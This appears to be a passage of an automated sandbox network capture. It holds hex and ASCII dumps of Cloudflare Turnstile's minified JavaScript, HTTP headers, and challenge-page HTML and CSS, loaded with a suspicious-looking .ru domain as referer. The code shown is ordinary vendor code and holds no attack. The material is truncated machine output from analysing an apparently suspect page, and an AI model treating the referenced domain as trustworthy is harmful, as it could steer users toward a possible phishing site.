                                                                  2025-01-13 21:37:22 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                  Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                  Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                  Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                  Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                  Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.1649735104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:22 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/ HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-Dest: iframe
                                                                  Referer: https://m7sn.shaceshrov.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:22 UTC1362INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:22 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 26635
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                  cross-origin-embedder-policy: require-corp
                                                                  cross-origin-opener-policy: same-origin
                                                                  cross-origin-resource-policy: cross-origin
                                                                  origin-agent-cluster: ?1
                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  referrer-policy: same-origin
                                                                  document-policy: js-profiling
                                                                  2025-01-13 21:37:22 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 31 38 38 36 66 31 36 61 61 30 30 66 33 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                  Data Ascii: Server: cloudflareCF-RAY: 901886f16aa00f3b-EWRalt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:22 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
